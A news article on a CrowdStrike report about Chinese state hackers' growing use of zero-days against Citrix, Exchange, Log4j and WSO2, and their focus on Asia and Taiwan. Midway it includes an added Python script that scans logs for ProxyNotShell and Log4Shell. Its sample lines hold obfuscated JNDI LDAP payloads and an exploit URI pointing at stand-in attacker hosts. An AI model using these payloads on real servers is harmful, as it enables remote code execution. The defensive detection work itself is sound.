Chinese State Hackers Level Up Their Abilities: CrowdStrike
Beijing Looks for Enterprise Software Zero Days
Akshaya Asokan (asokan_akshaya) • February 28, 2023
A Chinese law requiring mandatory disclosure to the government of vulnerability reports appears to be paying dividends for state-connected hacking.
Chinese hackers connected to Beijing ramped up their use of zero-day vulnerabilities when attacking North American targets during 2022, says threat intelligence firm CrowdStrike.
The disclosure requirement, which took effect in September 2021, “is effectively crowdsourcing vulnerability research in China,” said Adam Meyers, senior vice president of intelligence at CrowdStrike.
“With this program, the Chinese government is up-levelling their capabilities,” Meyers told Information Security Media Group ahead of the company’s release of an annual assessment of the global threat landscape.
CrowdStrike’s assessment matches the conclusions of other companies, including Microsoft, which in November also found an increased use of zero-day exploitation by state hackers (see: China Likely Amasses 0-Days Via Vulnerability Disclosure Law).
Among the vulnerabilities most commonly exploited by Chinese hackers were flaws affecting Citrix Gateway, tracked as CVE-2022-27518; Microsoft Exchange Server, tracked as CVE-2022-41040; and Log4Shell, the Apache Log4j flaw tracked as CVE-2021-44228. The main targets were the American defense and telecommunications sectors, civil society and the pharmaceutical industry.
The company also highlights exploitation “consistent with China-nexus activity” of CVE-2022-29464, a flaw in WSO2 products that allowed hackers to reach into cloud computing infrastructure.
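As an added example (not code from the original article, and not CrowdStrike's own tooling), the script below scans web server log lines for two of the flaws named above: ProxyNotShell (CVE-2022-41040) and Log4Shell (CVE-2021-44228). The ProxyNotShell check mirrors the request-URI pattern Microsoft published in its interim URL Rewrite mitigation, and the Log4Shell check collapses the common `${lower:}`, `${upper:}` and `${::-}` lookup obfuscations before looking for `${jndi:`. The log lines are constructed for the example, not captured traffic; the Citrix and WSO2 flaws are not covered because the article gives no request-level detail for them.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server log lines (IIS- and Apache-style); not real traffic.
SAMPLE_LOGS = [
    '2022-10-01 12:00:01 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.7 Mozilla/5.0 200',
    '2022-10-01 12:00:02 10.0.0.5 POST /autodiscover/autodiscover.json?@evil.example/powershell?X=Y - 443 - 203.0.113.7 python-requests/2.28 200',
    '203.0.113.9 - - [01/Oct/2022:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [01/Oct/2022:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9/x}"',
    '203.0.113.9 - - [01/Oct/2022:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Oct/2022:12:00:06 +0000] "GET /search?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.85"',
]

# CVE-2022-41040 (ProxyNotShell): Microsoft's interim mitigation was an IIS URL Rewrite
# rule blocking request URIs matching ".*autodiscover\.json.*\@.*Powershell.*"; this
# regex mirrors that published pattern (case-insensitively).
PROXYNOTSHELL_RE = re.compile(r'autodiscover\.json.*@.*powershell', re.IGNORECASE)

# Log4Shell (CVE-2021-44228): the trigger is a "${jndi:" lookup, often obfuscated with
# nested lookups such as ${lower:j} or the default-value form ${::-j}.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
CASE_LOOKUP_RE = re.compile(r'\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}', re.IGNORECASE)
DEFAULT_VALUE_RE = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')


def normalize_log4j_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse innermost ${lower:x}/${upper:x}/${...:-x} lookups to x, repeatedly,
    so obfuscated payloads reduce to the plain ${jndi:...} form. Bounded so that a
    pathological input cannot loop forever."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP_RE.sub(lambda m: m.group(1), text)
        new = DEFAULT_VALUE_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_line(line_no: int, line: str) -> list:
    """Return a list of findings for one log line (empty if nothing matched)."""
    decoded = unquote(line)  # payloads are frequently percent-encoded in the URI
    hits = []
    if PROXYNOTSHELL_RE.search(decoded):
        hits.append({'line': line_no, 'cve': 'CVE-2022-41040', 'rule': 'proxynotshell-uri'})
    if JNDI_RE.search(normalize_log4j_lookups(decoded)):
        hits.append({'line': line_no, 'cve': 'CVE-2021-44228', 'rule': 'log4shell-jndi'})
    return hits


def scan_lines(lines) -> list:
    """Scan an iterable of log lines; line numbers in findings are 1-based."""
    findings = []
    for i, line in enumerate(lines, start=1):
        findings.extend(scan_line(i, line))
    return findings


if __name__ == '__main__':
    for hit in scan_lines(SAMPLE_LOGS):
        print(hit)
```

Run against the constructed sample, the scan flags line 2 (ProxyNotShell URI) and lines 3, 4 and 6 (plain, `${lower:}`-obfuscated and percent-encoded `${::-}`-obfuscated JNDI lookups) while leaving the benign lines alone. The normalization step is the part worth keeping: a check for the literal string `${jndi:` misses the second and third Log4Shell variants.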
“There is increasing evidence that adversaries are growing more confident leveraging traditional endpoints to pivot to cloud infrastructure. The reverse is also true: Cloud infrastructure is being used as a gateway to traditional endpoints,” the report states.
The move to exploiting flaws for which the vendor had not yet released a patch, or had only recently done so, marks a departure from the initial access techniques previously associated with these groups, such as spear-phishing and credential theft.
If there is any consolation for North American cyber defenders in the CrowdStrike report, it is that the primary targets of Chinese state-connected hackers were organizations in Asia, mainly in the government, technology and telecommunications sectors.
“Intrusions in these regions accounted for roughly two-thirds of the China-nexus targeted intrusion activity CrowdStrike Intelligence confirmed in 2022,” the report states. That finding also tracks with other threat intelligence, including IBM, which found that the Asia-Pacific region accounted for nearly a third of all incidents it monitored in 2022 (see: Asia-Pacific Faced the Highest Share of Cyberattacks in 2022).
Taiwan absorbed a hefty amount of Chinese state-directed hacking, a development CrowdStrike says is likely fuelled by economic espionage. The operations may nonetheless support Beijing’s desire for “unification” with Taiwan, given the People’s Republic of China’s aggressive assertions of sovereignty over the island nation.
The pace of Chinese state hacking nevertheless did not increase before or after then-U.S. House Speaker Nancy Pelosi’s visit to Taiwan, during which she declared solidarity with Taipei.
Taiwanese government sites did experience distributed denial-of-service attacks in the lead-up to Pelosi’s visit, but that activity was “Chinese-affiliated nationalist hacktivist activity” rather than state-directed, CrowdStrike says.